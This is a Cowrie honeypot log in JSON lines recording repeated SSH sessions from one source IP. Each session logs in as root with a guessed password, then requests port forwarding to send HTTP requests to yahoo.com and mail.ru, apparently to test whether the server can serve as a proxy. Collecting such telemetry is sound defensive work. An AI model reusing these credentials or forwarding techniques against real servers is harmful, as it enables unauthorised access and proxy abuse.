{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":3340,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:3340","sensor":"my-vps","timestamp":"2025-08-31T03:54:00.096789Z","session":"76ff93bc32a1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:00.147374Z","src_ip":"77.83.207.83","session":"76ff93bc32a1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":17542,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:17542","sensor":"my-vps","timestamp":"2025-08-31T03:54:00.288936Z","session":"76ff93bc32a1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:00.339449Z","src_ip":"77.83.207.83","session":"76ff93bc32a1"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:00.390965Z","src_ip":"77.83.207.83","session":"76ff93bc32a1"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":47119,"dst_ip":"1.2.3.4","dst_port":22,"session":"84961af08814","protocol":"ssh","message":"New connection: 77.83.207.83:47119 (1.2.3.4:22) [session: 84961af08814]","sensor":"my-vps","timestamp":"2025-08-31T03:54:00.439287Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:00.440443Z","src_ip":"77.83.207.83","session":"84961af08814"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:00.490321Z","src_ip":"77.83.207.83","session":"84961af08814"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:00.739168Z","src_ip":"77.83.207.83","session":"84961af08814"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":6640,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:6640","sensor":"my-vps","timestamp":"2025-08-31T03:54:00.789977Z","session":"84961af08814"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:00.840234Z","src_ip":"77.83.207.83","session":"84961af08814"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":9830,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:9830","sensor":"my-vps","timestamp":"2025-08-31T03:54:00.980271Z","session":"84961af08814"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:01.030279Z","src_ip":"77.83.207.83","session":"84961af08814"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":23744,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:23744","sensor":"my-vps","timestamp":"2025-08-31T03:54:01.172191Z","session":"84961af08814"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:01.222187Z","src_ip":"77.83.207.83","session":"84961af08814"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:01.273038Z","src_ip":"77.83.207.83","session":"84961af08814"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":47216,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c8a07b10660","protocol":"ssh","message":"New connection: 77.83.207.83:47216 (1.2.3.4:22) [session: 8c8a07b10660]","sensor":"my-vps","timestamp":"2025-08-31T03:54:01.322915Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:01.323821Z","src_ip":"77.83.207.83","session":"8c8a07b10660"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:01.374265Z","src_ip":"77.83.207.83","session":"8c8a07b10660"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:01.624891Z","src_ip":"77.83.207.83","session":"8c8a07b10660"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":32244,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:32244","sensor":"my-vps","timestamp":"2025-08-31T03:54:01.677017Z","session":"8c8a07b10660"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:01.727604Z","src_ip":"77.83.207.83","session":"8c8a07b10660"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":26064,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:26064","sensor":"my-vps","timestamp":"2025-08-31T03:54:01.868783Z","session":"8c8a07b10660"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:01.919201Z","src_ip":"77.83.207.83","session":"8c8a07b10660"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":6710,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:6710","sensor":"my-vps","timestamp":"2025-08-31T03:54:02.064908Z","session":"8c8a07b10660"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:02.116019Z","src_ip":"77.83.207.83","session":"8c8a07b10660"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:02.167425Z","src_ip":"77.83.207.83","session":"8c8a07b10660"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":47311,"dst_ip":"1.2.3.4","dst_port":22,"session":"71d6d45a54a0","protocol":"ssh","message":"New connection: 77.83.207.83:47311 (1.2.3.4:22) [session: 71d6d45a54a0]","sensor":"my-vps","timestamp":"2025-08-31T03:54:02.215504Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:02.225654Z","src_ip":"77.83.207.83","session":"71d6d45a54a0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:02.265529Z","src_ip":"77.83.207.83","session":"71d6d45a54a0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:02.513183Z","src_ip":"77.83.207.83","session":"71d6d45a54a0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":6527,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:6527","sensor":"my-vps","timestamp":"2025-08-31T03:54:02.564127Z","session":"71d6d45a54a0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:02.613897Z","src_ip":"77.83.207.83","session":"71d6d45a54a0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":2228,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:2228","sensor":"my-vps","timestamp":"2025-08-31T03:54:02.756088Z","session":"71d6d45a54a0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:02.805840Z","src_ip":"77.83.207.83","session":"71d6d45a54a0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":10418,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:10418","sensor":"my-vps","timestamp":"2025-08-31T03:54:02.947932Z","session":"71d6d45a54a0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:02.997994Z","src_ip":"77.83.207.83","session":"71d6d45a54a0"}
{"eventid":"cowrie.session.closed","duration":12.75369119644165,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:03.025639Z","src_ip":"212.227.235.229","session":"248f20119b8c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:03.048225Z","src_ip":"77.83.207.83","session":"71d6d45a54a0"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":47411,"dst_ip":"1.2.3.4","dst_port":22,"session":"8769472a8914","protocol":"ssh","message":"New connection: 77.83.207.83:47411 (1.2.3.4:22) [session: 8769472a8914]","sensor":"my-vps","timestamp":"2025-08-31T03:54:03.097291Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:03.107337Z","src_ip":"77.83.207.83","session":"8769472a8914"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:03.147631Z","src_ip":"77.83.207.83","session":"8769472a8914"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41229,"dst_ip":"1.2.3.4","dst_port":23,"session":"f25ab11d87c9","protocol":"telnet","message":"New connection: 212.227.235.229:41229 (1.2.3.4:23) [session: f25ab11d87c9]","sensor":"my-vps","timestamp":"2025-08-31T03:54:03.254959Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:03.396456Z","src_ip":"77.83.207.83","session":"8769472a8914"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":29065,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:29065","sensor":"my-vps","timestamp":"2025-08-31T03:54:03.447131Z","session":"8769472a8914"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:03.497168Z","src_ip":"77.83.207.83","session":"8769472a8914"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":28034,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:28034","sensor":"my-vps","timestamp":"2025-08-31T03:54:03.640306Z","session":"8769472a8914"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:03.690593Z","src_ip":"77.83.207.83","session":"8769472a8914"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":31161,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:31161","sensor":"my-vps","timestamp":"2025-08-31T03:54:03.832476Z","session":"8769472a8914"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:03.882589Z","src_ip":"77.83.207.83","session":"8769472a8914"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:03.933232Z","src_ip":"77.83.207.83","session":"8769472a8914"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":47535,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdf1dbd19fed","protocol":"ssh","message":"New connection: 77.83.207.83:47535 (1.2.3.4:22) [session: fdf1dbd19fed]","sensor":"my-vps","timestamp":"2025-08-31T03:54:03.982863Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:03.983548Z","src_ip":"77.83.207.83","session":"fdf1dbd19fed"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","